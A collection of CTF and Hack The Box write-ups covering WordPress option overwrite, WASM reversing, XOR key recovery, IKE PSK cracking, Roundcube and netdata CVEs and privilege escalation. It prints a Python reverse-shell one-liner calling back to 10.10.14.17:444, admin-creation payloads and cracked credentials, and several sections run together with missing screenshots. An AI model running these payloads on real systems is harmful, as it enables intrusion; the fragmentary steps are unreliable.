Logic Bypass via
init
Hook: The plugin attaches its logic to the WordPress
init
hook. This is a global hook that fires on every single page load, regardless of whether a user is logged in or not. The code checks for the presence of a
settings
GET parameter and, if found, immediately invokes the
admin_page()
function. Crucially, this function call occurs before WordPress performs standard authentication checks or verifies user capabilities (such as
is_user_logged_in()
), effectively bypassing access controls.

Arbitrary Option Overwrite (The Sink): Once inside the
admin_page()
function, the code accepts the
$_POST['my_plugin_action']
parameter and passes it directly as the key argument to the WordPress
update_option()
function.

Failing to implement a whitelist of permitted settings, this creates an Arbitrary Option Update primitive. An attacker can supply any key found in the
wp_options
database table (e.g.,
default_role
,
siteurl
,
users_can_register
) and overwrite its value with their own input, allowing for complete reconfiguration of the target site.

Solution :

The Attack Chain

Reconnaissance: Identified the custom plugin exposing
?settings=1
.

Exploit Primitive (Option Overwrite):

Target:
update_option($_POST['my_plugin_action'], $mode)

Payload:
users_can_register=1
and
default_role=administrator
.

Reverse Engineering :

Reverse 1:

Clock Work Memory:

We are given a
.wasm
file , simply throw it to any decompiler.

We notice a check_flag function :

The function had a Hex which stores integer :
1262702420
and a HEX :
0x4B434F54

Deriving Little Endian in ASCII from this based on WASM , we get “TOCK”

We have a data Section :

Now using Cyber Chef we get the flag :

PWN:

Pwn 3:

Feel my terror:

We got the following files in zip:

Now to understand the environment :

$ file feel_my_terror

Since PIE is static we know that the variables remain constant .

Now in IDA :

main()
has a lot of functions but the interesting seemed to be a check database function:

check_db
seems to be comparing and storing addresses which we need to modify :

Now time to assign required values to arg1, arg2…arg5 by finding their address :

This tells us that CIPH3 will reveal the flag , CIPH1 is encrypted using PLAIN1, and CIPH2 is independent and therefore useless ,so we focus on only these two.

We also notice, s = seed & 0xFF so we know that keystream starts from 0 .

Objective:

We need to get key for CIPH3 to decrypt it , from CIPH1 using the PLAIN1 as the key then again use the same recipe in CyberChef but replace input text as CIPH3.

I. Get key for CIPH3 XOR, ie recover key:

Use input as CIPH1 with XOR key as PLAIN1.

Convert it to Hex again. Store the Output.

II. Use the Output as key:

Use the same recipe but replace input with CIPH3 and key for XOR with the saved key , Cyber chef will auto recommend from Hex if you didn’t modify the recipe (you can remove to Hex block, if you want to since it is unnecessary) and there you get the flag.

Web

2. Breached

Plan:

Inspect the given source, server.py to understand where the flag comes from.

Download  runtime_db.csv containing all users.

Use the provided HaveIBeenChowned (HIBC) to find which account was breached.

Reproduce the HMAC-token logic and compute the flag candidate.

Describe alternative checks and next steps if the candidate is rejected.

1) Read the app and identify the flag logic

File: server.py

load users from CSV: load_users_with_meta (path=‘app/runtime_db.csv’) — the CSV stores email,password_hash.

FLAG_SECRET and ADMIN_API_KEY are loaded from .env. Example values found in .env:

· FLAG_SECRET=3HZ0jv5EuC4WHoJnxGKDxuoD9mCkxHMlJz3MucS6U40k7lLdqDqlF2pmeDRT2W

·ADMIN_API_KEY=6208d4e88be3d7a2c6845189a23954420f037a262d13a833b9ace3ef98a35ee0

token generation function:

* token_for_email(email: str) -> str:

* uses hmac.new(FLAG_SECRET.encode(‘utf-8’), email.encode(‘utf-8’), hashlib.sha256).hexdigest().

* This produces a 64‑hex character token (SHA256 HMAC hex digest).

In /welcome route:

If session has email, the code computes mytoken = token_for_email(email).

It compares mytoken to FLAG_TOKEN via hmac.compare_digest(mytoken, FLAG_TOKEN).

If equal, the flag string shown is trustctf{<token[:12]>} (first 12 hex chars of the HMAC).So the first 12 characters will be the flag.

Implication: The flag corresponds to the HMAC of the admin email using FLAG_SECRET. If we can identify the admin email, we can compute token_for_email(admin_email) locally (we have FLAG_SECRET from .env) and produce trustctf{<first12>}.

2) Obtain the database:

We have an admin-only endpoint /download_db ,which checks for the ADMIN_API_KEY. We used the ADMIN_API_KEY from .env to send a request to https://tlctf2025-data-app.chals.io/download_db?api_key=<ADMIN_API_KEY> and saved the response as runtime_db.csv.

File has header email,password_hash.

The CSV contains the entries we expect, e.g.:

flaguser@example.com,5e502d72a3d25d7c1a6d056b597c67cd (last line)

blake.baker20@acme.test,1da1bd7ade565168798200ebecabec78

This also confirms ,we have a full export and can iterate over all accounts.

Commands used (example):

Download and save DB:

requests.get(’https://tlctf2025-data-app.chals.io/download_db’, params={‘api_key’: ADMIN_API_KEY})

3) Use HIBC to find the breached admin

The challenge gave https://tlctf2025-hibc.chals.io/ — a local breach API with endpoint /check_email?email=….

Strategy:

Query /check_email?email=<each email> for all rows in runtime_db.csv.

The HIBC response contains fields like {‘email’: …, ‘pwned’: True/False}.

If plaintext_password is present, we could attempt to log in directly.

Scanning:

After scanning all 499 emails the only account that returned pwned as True (breached) which was:

blake.baker20@acme.test with response {‘email’: ‘blake.baker20@acme.test’, ‘plaintext_password’: None, ‘pwned’: True}

flaguser@example.com was present in runtime_db.csv, but HIBC returned pwned as false thus, it’s not the breached account per HIBC.

3. SecureAPI:

We’re given a file named app-public.py

The code clearly shows it can’t be SQLi since it has definitive checks and there’s no way to inject a query here without returning an error.

We have a /register endpoint where we can register a new user .

/login will just give us a token which we could probably use . This seems to be directly pointing at IDOR already so I checked the other endpoints.

The snippet clearly says we need balance above 10000:

resp = {‘username’: row[‘username’], ‘balance’: row[‘balance’]}

if row[‘balance’] >= 10000:

resp[‘flag’] = ‘trustctf{REDACTED}’

return jsonify(resp)

This is not possible with our account since we get only 100.

You could check admin’s balance using: /api/balance?username=<your registered user>&username=admin

Now in /balance :

An ssh and no creds lying around in info. So had to switch to UDP.

Nmap is very slow with the -sU flag (Terrible with UDP scans ) so I switched to RustScan:

After a little more search I came across a tool named ike-scan . I searched for IKE vulnerabilities and found a term “aggressive” which stuck with me. Now there also existed an aggressive flag with ike scan , so I decided to go ahead with it.

Now I know that the auth is PSK and hash is SHA-1 (exploitable) so I headed back to the kali tools section: IKE-SCAN , where I remembered that psk-crack exists as a package [yes memory helps solve problems quicker lol ].

Now it was time to study flags again , now I sent a request as ike@expressway.htb and stored it as .psk.

Now this gave us the password to the ssh .

Now time to ssh:

ssh ike@expressway.htb

Note that there was a login on September 17 , this gave me a hint to search for logs.

Now it was time to enumerate again:

I wondered why does expressway exist here again. So expressway was the root maybe idk.

I thought Audit will solve my problems but :

Now I saw a folder named Squid in
/var/logs
so I googled it:

A little googling revealed that
access log
would tell us stuff [Also I just grepped .htb to search any matches early on ]:

How ever it still didn’t let me open the actual zip file so theres something fishy.

This gave me two clues that there’s probably a secret user expressway since both the messages said ike cant run on expressway.

Another thing that I noted that the system didn’t have a /bash of its own . This means I can impersonate a root . I knew about this since it was a famous flaw CVE-2025-32462: Host Option Privilege Escalation

Now it was all a matter of creating one using the above two clues we obtained.

We got the root , now time to get flag.

Yayy we got the root flag!!!

The box was heard in the sense of searching around for the tools itself and ofcourse the exploit . A quicker way to solve it wouldve been to use a privilege escalation script after getting SSH [using linpeas or a similar tool]. However I wanted to try it out using simpler methods and it seems that the offramp was an easter egg of sorts . Kind of liked it.

I rate this box a 7.5/10 [Extra points for being unique] and a difficulty of 6/10.

This was a good box but very script oriented and required a lot of tweaking around . Modifying the payload was the hardest part ( I had a lot of help ) . The rest was pretty reasonable . I rate this box 8/10 for difficulty (not recommended for beginners ) . But it did teach me a lot

Searching around I found an exploit : CVE-2025-24893

Now I tried using sudo -l but I didnt have privilages so I ran something that revealed there was a flawed netdata version running, which I found out after searching around and using
netstat -ntul
. It was running on port 19999.

Got an exploit using CVE-2024-32019 after searching around a little.

Following the steps given in the repo from here:

compile the C file

upload it using any method you have (I used scp )

give execution permissions and make sure the executable runs this time .

Now time to ssh into enzo:

I found the user flag on home itself :

Now I started searching around and found absolutely nothing partly because my stupid ass forgot to search ‘/’ .

I spent a lot of time here for absolutely no reason.

Now we note that there is a docker running that runs cleanup.sh for a set interval and we note the creds:

The creds we got here were :

root
P4ssw0rdS0pRi0T3c

Now I needed to figure out how to use the creds so i started searching running services.

Then I noticed port 8000 being active so I forwarded it to make it viewable through my browser :

tcp 127.0.0.1:8000 0.0.0.0:* LISTEN -
then
ssh enzo@planning.htb -L 8000:127.0.0.1:8000

So in my localhost8000 , I found after entering the creds we got earlier :

It is easy to figure out from here ,since all I need to do is set up a reverse shell somehow .

Then it was all about creating a shell again so I created a python payload to give us a shell that can be pasted as a job.

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.17',444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

Then I pasted it as a command in thejob :

Now again i set up a netcat listening at 444 where I finally got the shell.

Then of course the root flag was present in the home directory .

We got the flag yayyy!!!

I rate the difficulty a 7/10 since it took me 5 days to figure out ( I was busy too lol, but I did invest proper time into this so Im satisfied)

https://github.com/numirias/firefed

From here it was just studying documentation to get the creds:

I used
-p . history
to fetch browser history. Which gave me the following output:

The notable url here is the paste bin :
https://pastebin.com/ViYVbkRq

The url led me to a locked webpage:

The input used :

<input type="password" id="postpasswordverificationform-password" class="form-control" name="PostPasswordVerificationForm[password]" aria-required="true">

Which confirmed that it used forms and ofc I tried searching using forms so I used the command :

firefed -p . forms

This gave us the creds:

We had already seen a url in paste bin with
/ashrick
and ofcourse we saw the method so , the password only felt valid to be with
PostForm[password]=r0llr1ck0202!

using the creds in the URL we got the flag:

Lets visit the webpage ,

Before this make sure to sure to add the ip and mail.outbound.htb in /etc/hosts

Now note the version of the roundcube

A simple google search and we see:

After reading around I came across a github repo :

CVE-2025-49113

Using this I managed to get a Reverse Shell

(Yes I had to switch to PWN box due to issues in my internet . Because I was exhausted debugging it for days)

Note: Make sure that the listener is open before executing the exploit.

Now searching around in the configs directory we find a config.php file where we get the following :

Now we execute SQL commands to find out the users

We can see that the above details are encoded in Base64 hence we switch to cyber chef where we try to decipher the text

I have reduced it to the important part:

Now decoding the password from Base64 we get:

Now note the des_key from the config file ( It hinted triple DES so I directly knew what to do next)

Figuring out the keys properly took me a while since im dumb however I managed to finally get the output

Recap of used details I used so far :

rcmail-!24ByteDESkey*Str

2fb46fd3403c4eec

0902bebb9084f1c5c4a09c8936e409bf

We get : 595mO8DmwGeD

Now we switch to jacob and enumerate

It took me a while to thoroughly search but I figured INBOX would where it would likely be so I scourged there.

Now we got the ssh creds for Jacob and managed to finally get the shell

gY4Wr3a1evp4

We finally got the user.txt (Yayyy!!!)

Again I tried to root but it didnt workout so I spent hours googling and finally asked ChatGPT about /below . Finally I understood the directory and files in below . With a sequence of manipulation by removing the error files and manipulating it into /etc/passwd I finally managed to make my dummy account (donut hahaha) the sudo. I had to restart my machine a few times to get it right since it broke down with bad configs.

This took the longest time to get right but I managed to finally get it done.

We finally got the flag and we were done . YAYYY!!!

I rate this machine a solid 6/10 for difficulty (Skill issues from my side were very apparent :( )

We find a python code editor interestingly:

print(locals()) gave me the following output:

print(globals()) revealed a lot of details too ,but nothing interesting except a few functions.

I switched to burp and ran the run_code function where i noticed SQl Alchemy .(Ha ha some juicy stuff)

After running through some documentation I gave the following query :

users = User.query.all()

    print(user.password)

This gave me:

759b74ce43947f5f4c91aeddc3e5bad3

Reversing these MD5 hashes we get :

There was nothing useful with user development!!! 😠. After spending a day I decide to move on to martin.

I used hashcat however it took forever.

I decided to use the rockyou.txt finally(My computer died plenty of times before it cracked the hash) and got password as
nafeelswordsmaster
.

now ssh to martin and we get a nice shell.

Now I started looking around to find something interesting where I came across a directory named
/backups
and an unusual file named
/backy.sh
.

Searching around in backy.sh:

I realised that I needed to find a .json file .

Now in backups there was task.json with the following contents :

I ran task.json with backy.sh and found the following:

I found a .bz2 file , I extracted it and found the deployment code for the website. Nothing here was interesting , since we were way past the stage , yet I searched around.

Now I knew that I had to somehow modify this file to get a file . ( This was the hardest part among others, I generated so many versions and had to take a break and start again after a day.)

Modify task.json’s “directories_to_archive” field from
/../app-production
to
/../app
.This will create a zip file that you can extract using
tar-xf
.(this took a while to figure out).

Extracting the .bz2 file will create a home directory in which you can get the user flag .

Now to obtain root I had to modify task.json plenty of times and I noticed that it removed “../” in directories_to_archives . My dumb ass took a while to figure out that I needed to modify
exclude
field too . Even after that, it took me a while to get it right

Correct task.json to get root .bz2 file:

Now there’s a new .bz2 file with root in file name .

Extracting it will get you a root folder in which root.txt lies:

We pwned it YAYYY!!!!

I had gotten the root flag before the user flag , the user flag was harder to get to be honest. I remodified tasks.json and respawned the machine plenty of times to makes sure I didn’t miss out on the user flag (got better screenshots haha 🥲)and somehow managed to get root before user..

That said, this was a simple box yet finding ways to go around it took quite a while , I rate this a 5/10.
